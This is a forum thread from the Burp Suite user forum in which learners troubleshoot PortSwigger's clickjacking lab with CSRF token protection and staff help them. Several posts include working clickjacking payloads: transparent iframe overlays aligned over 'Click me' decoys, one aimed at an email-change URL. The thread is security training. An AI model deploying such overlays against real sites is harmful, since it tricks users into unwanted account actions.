Burp Suite User Forum

Login to post

Having issue signing into the "Basic Clickjacking with CSRF token protection" lab

Phil | Last updated: Jan 06, 2020 09:17PM UTC

I'm unable to even start the lab (https://portswigger.net/web-security/clickjacking/lab-basic-csrf-protected). The provided credentials, carlos/montoya, do not work for me. Any ideas?

Ben, PortSwigger Agent | Last updated: Jan 07, 2020 09:00AM UTC

Hi, I have just checked this lab and the credentials are working fine for me. Have you accidentally deleted the carlos/montoya by mistake during the course of the lab?

Burp User | Last updated: Jan 07, 2020 02:52PM UTC

That was precisely it. I must have unknowingly clicked on Delete at some point. I'm now able to sign in but once I store the HTML and "View exploit", the Test Me button is not loading properly. Here is what I'm getting, https://imgur.com/a/7dUgtRs. Any assistance would be awesome.

Hannah, PortSwigger Agent | Last updated: Jan 07, 2020 02:52PM UTC

What values are you using for width and height? Have you tried adjusting the width, height, top and left values?

Burp User | Last updated: Jan 07, 2020 03:09PM UTC

This is what I have as far as the params. <style> iframe { position:relative; width:$ 500px; height: $ 700px; opacity: $opacity; z-index: 0.0001; } div { position:absolute; top:$ 320px; left:$ 60px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://ac061faa1f6cc0c280ac415e00f80099.web-security-academy.net/account"></iframe>

Hannah, PortSwigger Agent | Last updated: Jan 07, 2020 03:11PM UTC

To start with, you will need to remove all the dollar signs that are present in your code. Your first z-index will need to be changed back to 2. You will need to change $opacity to an actual value. The suggested initial value is 0.1. Additionally, the victim will be using Chrome, so if you aren't already, you should be testing using that browser. Please let me know if these steps do not resolve your issue.

Burp User | Last updated: Jan 07, 2020 03:33PM UTC

Tyvm Hannah, Idk how the HTML code was so butchered lol. Appreciate the help!

Hannah, PortSwigger Agent | Last updated: Jan 07, 2020 04:03PM UTC

No problem. Enjoy the rest of the labs!

Matthieu | Last updated: Apr 14, 2020 07:20PM UTC

I am using the following values and when I look at the preview in chrome the text in covering the delete button but it does not validate the challenge for some reasons <style> iframe { position:relative; width:700px; height: 500px; opacity: 0.0001; z-index: 2; } div { position:absolute; top:355px; left:60px; z-index: 1; } </style> <div>Test me</div> <iframe src="https://accf1f211eb1ae9380fa2e0300f20051.web-security-academy.net/account"></iframe>

Hannah, PortSwigger Agent | Last updated: Apr 15, 2020 07:16AM UTC

Hi Matthieu Have you tried changing "Test me" to "Click me"?

Ahmet | Last updated: Apr 16, 2020 04:04AM UTC

Hi, I accidentally deleted the user Carlos and can not login now, can you help

Hannah, PortSwigger Agent | Last updated: Apr 16, 2020 07:03AM UTC

Hi Ahmet If you wait about 15 minutes, the lab will expire and reset.

komal | Last updated: Aug 13, 2020 07:18AM UTC

hi am using the below html code <style> iframe { position:top; width:500px; height: 700px; opacity: 0.0001; z-index: 2; } div { position:left; top:300px; left:60px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://acdb1f761ea8fe71804c0822000a00d5.web-security-academy.net/account"></iframe> Still am unable to solve the lab

komal | Last updated: Aug 13, 2020 07:24AM UTC

basically when i hover on it cursor is not changing to hand indicating

Hannah, PortSwigger Agent | Last updated: Aug 13, 2020 09:41AM UTC

Hi Komal Have you followed along with the solution provided, or watched a video solution for reference?

Abishekraghav | Last updated: Aug 25, 2020 05:06PM UTC

Clickjacking Lab is not responding

Hannah, PortSwigger Agent | Last updated: Aug 26, 2020 08:16AM UTC

The labs reset after 15 minutes of inactivity. I can confirm that the lab is working as expected.

Bijackr | Last updated: Nov 19, 2020 03:21AM UTC

All clickjacking labs are working fine for me, but when I test my exploit in chrome it always detects it, I have tried different opacity levels too but chrome still says "unauthroized". Is there any way to perform clickjacking in chrome? Hannah?

Hannah, PortSwigger Agent | Last updated: Nov 19, 2020 10:03AM UTC

Hi. The "victim" is using an older (outdated) version of Chrome so it will work on their browser (allowing you to solve the lab). The "Test exploit" button does work on the built-in Chromium browser in Burp, as well as other browsers, so you could use a different browser to line up the components before delivering your exploit. Just copy and paste your URL into a different browser.

Hannah, PortSwigger Agent | Last updated: Nov 24, 2020 03:46PM UTC

Hi Had you logged into the lab account (carlos:montoya) in the browser you're using to test, so that there is a valid session when you test your exploit?

Andrea | Last updated: Jan 06, 2021 05:42PM UTC

Hi, all clickjacking labs are not working fine for me. I deliver the content, and exploit seems good, but lab is not solved. I use chrome. In the view exploit the "Click me" and "Change email" are perfectly aligned. Whats the problem? Thanx <style> iframe { position:relative; width: 700px; height: 500px; opacity: 0.0001; z-index: 2; } div { position:absolute; top:440px; left:80px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://ac1a1fe11e95a23b807a9085009600fc.web-security-academy.net/email?email=hacker@attacker-website.com"></iframe>

Andrea | Last updated: Jan 06, 2021 05:56PM UTC

Solved changing browser from chrome to Edge..i don't know why...

Prakhar | Last updated: Jun 05, 2021 12:25PM UTC

<style> iframe { position:relative; width:500px; height: 700px; opacity: 0.1; z-index: 2; } div{ position:absolute; top:400px; left:60px; z-index:1; } </style> <div>click me</div> <iframe src="https://ac331fa91f7aee0e808b90b000d20090.web-security-academy.net/my-account"></iframe> am facing the prblm with clickjacking even am using the chrome browser..

Prakhar | Last updated: Jun 05, 2021 12:26PM UTC

i have accidentally deleted the user but after sometime when the lab reset i haved tried again but its not working even after delivering the exploit to the victim..

Hannah, PortSwigger Agent | Last updated: Jun 07, 2021 08:17AM UTC

Hi Could you tell me the title of the lab you are having issues with? Is it still the "Basic Clickjacking with CSRF token protection" lab?

Gustavo | Last updated: Jul 15, 2021 12:25AM UTC

Hi I am having some trouble to solve this challenge. I already did all the adjusts and I tried to submit the solution in different browsers (Firefox, Edge y Brave) but I can not figure out what is going on. Could you please help me <style> iframe { position:relative; width:500px; height: 700px; opacity: 0.0001; z-index: 2; } div { position:absolute; top:500px; left:55px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://target-acc31f301e33dafa803938f000bf00c1.web-security-academy.net/my-account?id=wiener"></iframe>

Michelle, PortSwigger Agent | Last updated: Jul 22, 2021 02:57PM UTC

Thanks for your message. Keep trying, you're definitely getting close :) The victim will be using Chrome, so it's best to test the exploit using that browser. Also, double-check the URL you're adding to make sure it matches the general account page for your specific lab https://<Your_Lab_ID>.web-security-academy.net/my-account in case there are any typos in the URL as this will change the next time you try the lab. You might find this video created by one of the users in our community useful too: https://www.youtube.com/watch?v=cdswOMjPpDo Have fun!

You need to Log in to post a reply. Or register here, for free.